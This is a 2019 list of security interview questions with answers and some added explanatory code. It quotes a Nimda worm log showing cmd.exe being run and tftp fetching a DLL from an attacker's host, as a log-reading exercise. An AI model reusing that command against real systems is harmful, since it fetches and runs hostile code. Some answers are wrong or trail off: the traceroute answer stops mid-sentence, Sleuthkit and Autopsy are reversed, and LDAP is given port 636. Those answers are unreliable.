
8/3/2019 Security Interview Question
1/6

Security Interview Questions

We've collected and composed a series of potential interview questions and answers. These can be used by HR/Managers to gauge the level of knowledge required for a security related position. While most of the questions do not have right or wrong answers, they can be used to further delve into a candidate's experience/knowledge. If you have some that you would like to add, please email them to us.

What is NMAP? Security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor).

In a public key infrastructure (PKI), the authority responsible for the identification and authentication of an applicant for a digital certificate (i.e., certificate subjects) is called what? Registration authority (RA).

What's the difference between encryption and hashing? Encryption is reversible, as long as you have the appropriate key/keys, and the size of the ciphertext roughly matches the size of the plaintext. With hashing the operation is one-way, and the output is of a fixed length that is usually much smaller than the input.

What's the difference between Diffie-Hellman and RSA? Diffie-Hellman is a key-exchange protocol, and RSA is an encryption/signing protocol.

What kind of attack is a standard Diffie-Hellman exchange vulnerable to? Man-in-the-middle, as neither side is authenticated.

Cryptographically speaking, what is the main method of building a shared secret over a public medium? Diffie-Hellman.
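The exchange the two Diffie-Hellman questions above refer to, as an added example that is not part of the original list: both sides' messages, the shared value, and a hashed key derived from it. The 127-bit Mersenne prime and generator 2 are toy parameters chosen so it runs instantly; real deployments use a standardised large group.

```python
# Added example (not from the original question list): a Diffie-Hellman
# exchange with both sides' messages.  P is a toy 127-bit Mersenne prime,
# far too small for real use; production code uses a standardised
# 2048-bit+ finite-field group or an elliptic-curve group instead.
import hashlib
import secrets

P = 2**127 - 1   # toy prime modulus (assumption for the demo)
G = 2            # generator (assumption for the demo)


def make_keypair(p=P, g=G):
    """Pick a random private exponent x and publish g^x mod p."""
    private = secrets.randbelow(p - 2) + 1          # 1 <= x <= p-2
    public = pow(g, private, p)
    return private, public


def shared_secret(my_private, their_public, p=P):
    """Both sides compute (g^y)^x = (g^x)^y mod p and land on the same value."""
    if not 1 < their_public < p - 1:                 # reject degenerate 0, 1, p-1
        raise ValueError("bad public value")
    return pow(their_public, my_private, p)


def derive_key(secret, p=P):
    """Never use the raw DH output as a key: hash it to a fixed-length key."""
    length = (p.bit_length() + 7) // 8
    return hashlib.sha256(secret.to_bytes(length, "big")).digest()


def run_exchange():
    """Simulate Alice and Bob over a public channel; return both derived keys."""
    alice_priv, alice_pub = make_keypair()   # Alice -> Bob: alice_pub
    bob_priv, bob_pub = make_keypair()       # Bob -> Alice: bob_pub
    k_alice = derive_key(shared_secret(alice_priv, bob_pub))
    k_bob = derive_key(shared_secret(bob_priv, alice_pub))
    return k_alice, k_bob
```

Nothing in the two public values says who sent them, which is the man-in-the-middle point of the previous question; protocols such as TLS therefore sign or certify them on top of the bare exchange.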

What is Key Escrow? (Also known as a fair cryptosystem.) An arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys.

What does RSA stand for? I would be surprised if someone knew this answer: Rivest Shamir Adleman, for Ronald L. Rivest, Adi Shamir and Leonard M. Adleman.

What is DES? Data Encryption Standard is a block cipher (a form of shared secret encryption).

What is Triple DES? Common name for the Triple Data Encryption Algorithm (TDEA) block cipher. It applies the DES cipher algorithm three times to each data block to increase the key size.

What is the difference between Symmetric and Asymmetric? Single key vs. two keys.


In public-key cryptography you have a public and a private key, and you often perform both encryption and signing functions. Which key is used for which? You encrypt with the other person's public key, and you sign with your own private key.

If you had to both encrypt and compress data during transmission, which would you do first, and why? Compress then encrypt. If you encrypt first you'll have nothing but random data to work with, which will destroy any potential benefit from compression.

How does HTTP handle state? It doesn't, that's why cookies were invented.

What port does ping work over? ICMP is layer 3 and doesn't use ports.

How exactly does traceroute/tracert work at the protocol level? Many people think that it first sends a packet to the first hop, gets a time. Then it sends a packet to the second hop, gets a time, and keeps going until it gets. The extra credit is the fact that Windows uses ICMP by default while Linux uses UDP.

What exactly is Cross Site Scripting? A type of computer security vulnerability typically found in web applications which allows code injection by malicious web users into the web pages viewed by other users.

What's the difference between stored and reflected XSS? Stored is on a static page or pulled from a database and displayed to the user directly. Reflected comes from the user in the form of a request (usually constructed by an attacker), and then gets run in the victim's browser when the results are returned from the site.

What are the common defenses against XSS? Input Validation/Output Sanitization, with focus on the latter.

What is Cross-Site Request Forgery? When an attacker gets a victim's browser to make requests, ideally with their credentials included, without their knowing. A solid example of this is when an IMG tag points to a URL associated with an action, e.g. http://foo.com/logout/. A victim just loading that page could potentially get logged out from foo.com, and their browser would have made the action, not them (since browsers load all IMG tags automatically).

How does one defend against CSRF? Logging out of sites and avoiding their "remember me" features can mitigate CSRF risk; not displaying external images or clicking links in "spam" or untrusted e-mails may also help. Requiring authentication in GET and POST parameters, not only cookies; checking the HTTP Referer header; ensuring there's no crossdomain.xml file granting unintended access to Flash movies; and limiting the lifetime of authentication cookies.
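One server-side check for the IMG-tag logout scenario above, as an added example that is not part of the original list: state changes are only accepted over POST and must carry a token bound to the session, which a page on another site cannot read. The handler, its request shape and the session ids are hypothetical.

```python
# Added example (not part of the original list): a minimal CSRF check for
# the http://foo.com/logout/ scenario.  handle_request and its argument
# shape are hypothetical; the idea is the synchronizer-token pattern.
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # generated per process; never exposed to pages


def csrf_token(session_id):
    """Derive a token bound to this session; a cross-site page cannot obtain it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_request(method, path, session_id, form=None):
    """Return (status, message) for a request to /logout/.

    method      HTTP verb the browser used
    session_id  value of the session cookie the browser attached automatically
    form        POST body fields, if any (constructed dict in this example)
    """
    form = form or {}
    if path != "/logout/":
        return 404, "not found"
    # <img src="http://foo.com/logout/"> on any site produces exactly this:
    # a GET with the victim's cookie attached.  Refuse to change state on GET.
    if method != "POST":
        return 405, "state-changing actions require POST"
    sent = form.get("csrf_token", "")
    expected = csrf_token(session_id)
    # A cross-site form can POST, but it cannot know the token, so this fails.
    if not hmac.compare_digest(sent, expected):
        return 403, "missing or invalid CSRF token"
    return 200, "logged out"
```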

What kind of network (lab) do you have at home? I've yet to meet a serious security guy who doesn't have a considerable home lab or network.

As a corporate Information Security professional, what's more important to focus on: threats or vulnerabilities? Opinion-based, but the correct answer should be vulnerabilities as


this is what we can control in a corporate environment, as we have little control over the threats.

What's the difference between a risk and a vulnerability? If a CISSP gets this wrong, move along. Risk is dependent on a vulnerability, whereas a vulnerability is a weakness and risk is the threat of an action or event.

What is a Buffer Overflow? An anomaly where a process stores data in a buffer outside the memory the programmer set aside for it.

What is a NOP Sled? A sequence of NOP (no-operation) instructions (on x86, opcode 0x90) meant to "slide" the CPU's instruction execution flow to its final, desired destination.

Someone wants to test out a new product that works on a wireless network, how would you advise them to test out the product? This will give you a really good idea of how well wireless security is known by the candidate, as well as how much they are willing to work with the business to test the new product. If they come up with a clean, segregated network to test on that does not touch the main corporate network, or links to the internet in a DMZ-type situation, that is promising. If they ask for a Faraday cage, you might not have a winner here.

A business team has developed this brand new web site that you just tested and found a number of XSS errors in, how would you handle that? This will let the interviewer know if the candidate has any idea about web security and development. If they offer to work with the developers to solve the issue you have a good candidate; if the candidate says it is the developer's problem and that they cannot help them or the business, then this might not be the candidate for you.

Ask the candidate to "Design a secure network". This is meant to see how the candidate thinks; you can add something like "design a secure network between two offices that is also optimized or has QoS for various protocols". Ask how they would securely link two offices together? Protocol stack, VPN solutions. You might want to include trusted partners.

What is your Blog URL? If they have a blog then you need to know what they blog about. If they blog about tech, that means they live, eat and breathe this stuff, and that is good. If they are slamming their co-workers, families, friends, or generally how they pulled one over on someone, this might not be the person for you.

What is your MySpace page? You have to ask this one for the same reason that you ask what their blog URL is: do they meet the needs of the company. I tend to dismiss the use of MySpace as something that I wouldn't want to have or know someone that uses it, but that's my opinion.

What papers have you written? The answer to this is the same as the blog. If they don't blog and they don't write, then ask them what they are reading in the news. Are they staying up on the technology? If not, you might not have a winner here.

What is the secret sauce to a Cisco command? This will let you know if they have any hands-on with a Cisco device at all; this can be important depending on what the security engineer will be doing. BTW, the answer is TAB.

What do you think of Teams? This is the ultimate people question; if they say they like teams, ask them why. If they say they like people, ask them why, what is it that drives their relationships with others. This opens up a whole line of questioning about how well they like people, how well they can train others, and their viewpoints on working with others. You really do want a social person, or at least a person sociable enough for the company.

What is the security threat level today at the Internet Storm Center (ISC)? You should know that it's almost always Green. Are they in touch with the current situation?

Ask them what their favorite security web sites are. You should at least hear one you already read; if not, check them out (write them down) and see what they are like. Are they deep geek techno security, or are they fluff, Fox News kind of stuff?

Hand them a security scan of a network and ask them to interpret it. This is always good to see if they know what they are looking at, and can derive information from it.

Hand them a web site security scan and ask them to interpret it. This is always good to see if they know what they are looking at, and can derive information from it.


Show them a security policy from the company, and ask how they would enforce it. This is always good; you find out what kind of leader they are. Do they intend on teaching and enforcement, or do they go right to punitive damages?

Show them a hack attack against something, down to the packet level, and ask what they would do. You have to hand them the entire attack, not just snippets of info. Find out what they know and whether they can interpret information well enough to be of use to the employer.

What is their dream information security job? This is always good to find out how ambitious they are, where they see themselves in a while, and to determine whether there is a good fit between the job and the candidate.

Ask them to explain SOX, HIPAA, PCI and GLB (if applicable).

What do you see as the most critical and current threats affecting Internet accessible websites? The goal of the question is to gauge the applicant's knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

What do you see as challenges to successfully deploying/monitoring web intrusion detection? You are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:
• Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
• Proper logging: increasing the verboseness of logging (Mod_Security audit_log)
• Remote centralized logging
• Alerting mechanisms
• Updating signatures/policies

What are the most important steps you would recommend for securing a new web server? There is no right or wrong answer. However, the following are good starting points:
• Update/patch the web server software
• Minimize the server functionality: disable extra modules
• Delete default data/scripts
• Increase logging verboseness
• Update permissions/ownership of files

What are the most important steps you would recommend for securing a new Web application?
• Make sure input validation is enforced within the code
• Security QA testing
• Ensure the application is configured to display generic error messages
• Implement a software security policy
• Remove or protect hidden files and directories

Imagine that we are running an Apache reverse proxy server and one of the servers we are proxying for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

You will know if the applicant is fluent at reading web server log files in the Common Log Format (CLF).
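As an added example that is not part of the original list, the parser below reads such entries as CLF and flags what the answer relies on: a request for cmd.exe, a follow-up that pulls a file with tftp, and the 200 status on each. The sample lines are constructed from the page's two entries (same client IP, timestamps and paths, with the standard ident and user dash fields filled in) plus one benign request.

```python
# Added example (not from the original list): CLF parsing and a check for
# the cmd.exe / tftp pattern in the proxy log entries.  SAMPLE_LOG is
# constructed from the page's two entries plus one harmless request.
import re
from urllib.parse import unquote

SAMPLE_LOG = r'''
68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"
10.0.0.5 - - [09/Mar/2004:22:24:10 -0500] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
'''

# host ident user [timestamp] "method target version" status bytes ...
CLF = re.compile(
    r'^(?P<host>\S+)\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+'
    r'"(?P<method>\S+)\s+(?P<target>\S+)(?:\s+\S+)?"\s+(?P<status>\d{3})\s+(?P<size>\S+)'
)


def parse_clf(line):
    """Return the CLF fields of one line as a dict, or None if it does not parse."""
    m = CLF.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["decoded"] = unquote(d["target"])   # tftp%20-%20... becomes readable
    return d


def classify(entry):
    """Label an entry: 'cmd-probe' for a bare cmd.exe call, 'cmd-tftp-fetch'
    when the command also pulls a file with tftp, else None."""
    target = entry["decoded"].lower()
    if "cmd.exe" not in target:
        return None
    return "cmd-tftp-fetch" if "tftp" in target else "cmd-probe"


def find_suspicious(log_text):
    """Return [(host, label, status)] for every entry that matches the pattern.

    A 200 on the cmd-probe followed by a cmd-tftp-fetch from the same host is
    the sequence the answer describes, so both the label and status are kept.
    """
    hits = []
    for line in log_text.strip().splitlines():
        entry = parse_clf(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            hits.append((entry["host"], label, entry["status"]))
    return hits
```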

In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

What is SSL? SSL is a set of cryptographic protocols that provide security and data integrity for communications over networks such as the Internet. TLS and SSL encrypt the segments of network connections at the Transport Layer end-to-end.

How do you create SSL certificates, generically speaking? To create a certificate, you generate a private key, generate a Certificate Signing Request, then generate and install the certificate.

What is DNS Hijacking? DNS hijacking is the practice of hijacking the resolution of DNS names to IP addresses by the use of rogue DNS servers, particularly for the practice of phishing.

What are IDA and/or Olly?

Debuggers.

Have you hacked any system? This is a unique question in that for some companies the answer should always be NO, as many companies have a hire-no-hacker policy. If they start answering by indicating a legal or ethical engagement, then you might want to delve into this a little more.

Have you released any worm/trojan/malicious code in the wild? Most definitely this answer should always be "NO."

If I give you two DLLs of different versions, one has the vulnerability and another is patched for that vulnerability, then how will you find the vulnerability? Load them up in a debugger to determine which is which. Validate the vulnerability by Googling, Microsoft, Secunia, etc.

What is the latest security breach you're aware of? The goal is to gauge if the candidate is up on data breach disclosure.

Can a Virtual Operating System be compromised? The obvious answer is yes, so mix it up with a follow-up about the host operating system being compromised from a guest. If they have no idea what a guest or host is then they don't understand virtualization security.

What sort of test would you perform to understand a virus? The idea here is to see if the candidate has an understanding of using a sandbox or external website for virus analysis.

What is UPX? The Ultimate Packer for eXecutables is a free and open source executable packer supporting a number of file formats from different operating systems.

What is meterpreter? Meterpreter is a command line program that extends the functionality of Metasploit.

What is LDAP? LDAP (Lightweight Directory Access Protocol) is a protocol for communications between LDAP servers and LDAP clients. LDAP servers store "directories" which are accessed by LDAP clients.

Why is LDAP called lightweight? LDAP is called lightweight because it is a smaller and easier protocol which was derived from the X.500 DAP (Directory Access Protocol) defined in the OSI network protocol stack.

What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog? The standard port numbers are respectively SMTP 25, POP3 110, IMAP4 143, RPC 135, LDAP 636, Global Catalog 3269.

How will you determine if a file is packed or not? There are numerous tools available to determine what packed a file: PEiD is a common tool that detects a large number of packers. File checksum checking services; cumulative anti-virus testing: VirusTotal, NoVirusThanks, ThreatExpert, and Jotti.

Do you have Rainbow tables? This may or may not be of importance, but if you're looking for a true pentester, the answer had better be yes.

What is dsniff? This is a good question to determine what they know about network auditing and penetration testing tools.

Have you ever used FTK, Encase, dc3dd, dd_rescue or dcfldd? This is used to determine if the candidate has any forensics experience.

Other than Wireshark, what sniffers have you used? Here we're looking for tcpdump, or something commercial.

Tell me what you know about Sleuthkit. Sleuthkit is an open source disk analysis/forensics frontend for Autopsy.

With regard to forensics, what is physically different about how the platters are used in a 3.5" and a 2.5" HDD? The platters are written outside to inside on a 3.5" drive, whereas the inside (closest to the spindle) is written first on a 2.5" drive.

What are DCO and HPA? DCO is Device Configuration Overlay and HPA is Host Protected Area. These are areas on a hard drive that are designed to store information in such a way that it cannot be easily modified, changed or accessed by the user, BIOS or OS.

Can DCO and HPA be changed? There is a tool called TAFT that can do this by talking directly to the ATA controller. There are numerous tools to remove HPA and DCO.

Describe a time when you implemented defense in depth. The goal here is to get the candidate to talk about multiple layers of security, like an onion.

What was the last course you attended? Where? When? Why? Has the candidate attended any training recently?

Describe the last security implementation you were involved with. The goal here is to get the candidate to talk about their involvement with the implementation of a security product, initiative or design.

Design a RADIUS infrastructure for 802.11 security and authentication. The goal of the question here is to gauge the applicant's knowledge of RADIUS. Do they use Realms?

What was the last technical book you read? The goal of the question here is to gauge the applicant's desire to gain knowledge outside of work.

What is your CISSP number? Check the status of the candidate's certification.

How would you decode the following packet in HEX?

4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001 0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 4153 7461 7262 7563 6b73 6361 7264

Convert this from text to pcap using text2pcap, then open in Wireshark.

What is a honeypot? A honeypot is simply a system, program or file that has absolutely no purpose in production. Therefore, we can always assume that if the honeypot is accessed, it is for some reason unrelated to your organization's purpose.

Are there limitations of Intrusion Detection Signatures? Signature based IDS provide a useful service to let an administrator know that he/she has been or is being attacked, but they should not be relied upon. It is far too easy to fool or shut down an IDS machine for them to be utilized as the primary line of defense against intruders.

What was ISO 17799 originally called? BS 7799.

What areas do ISO 27001 and 27002 cover? ISO 27001 covers the requirements for Information security management systems. ISO 27002 covers the actual practice for information security management.

Define an incident. This is really a question that is intended to elicit the amount of knowledge as well as the ability to think quickly. Candidates should say something similar to "an event that could or actually does have an adverse effect on a company, department, or system." A good follow-up is to ask for an example of an incident that they were involved with and how they handled it.

What is the difference between Encrypting and Encoding? In the simplest terms, it's the lack of a key.

What can protect you 100% from attack? If the candidate says any of the following you need to end the interview: Firewalls, AV, IDS/IPS, Encryption, policies. The point is there isn't anything that can protect you 100% of the time.
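For the hex packet question above, an added worked example that is not part of the original list: decoding the dump by hand in Python instead of going through text2pcap and Wireshark. The bytes are the page's own; the only assumption is that the layout is an IPv4 header followed by ICMP, which the version nibble and protocol byte confirm.

```python
# Added example (not part of the original list): decode the page's hex
# dump as IPv4 + ICMP and verify both checksums with the RFC 1071 sum.
import struct

PACKET_HEX = (
    "4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001 "
    "0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 "
    "4153 7461 7262 7563 6b73 6361 7264"
)


def inet_checksum(data):
    """One's-complement sum over 16-bit words; a valid header/packet returns 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def decode_ipv4_icmp(hex_dump):
    """Return a dict of the IPv4 and ICMP header fields plus the payload bytes."""
    raw = bytes.fromhex(hex_dump.replace(" ", ""))
    vi, tos, total_len, ident, flags_frag, ttl, proto, hdr_csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (vi & 0x0F) * 4                    # header length in bytes (IHL * 4)
    out = {
        "version": vi >> 4,
        "ihl_bytes": ihl,
        "total_length": total_len,
        "ttl": ttl,
        "protocol": proto,                   # 1 = ICMP
        "src": ".".join(str(b) for b in src),
        "dst": ".".join(str(b) for b in dst),
        "ip_checksum_ok": inet_checksum(raw[:ihl]) == 0,
        "length_matches": len(raw) == total_len,
    }
    if proto == 1:
        icmp = raw[ihl:total_len]
        itype, code, icsum, echo_id, seq = struct.unpack("!BBHHH", icmp[:8])
        out.update({
            "icmp_type": itype,              # 8 = echo request (ping)
            "icmp_code": code,
            "icmp_id": echo_id,
            "icmp_seq": seq,
            "icmp_checksum_ok": inet_checksum(icmp) == 0,
            "payload": icmp[8:],             # the echo data carried by the ping
        })
    return out
```

On this dump the ICMP checksum verifies, while the IPv4 header checksum field is zero and therefore does not, which is what a capture looks like when the stack or NIC has not yet filled that field in.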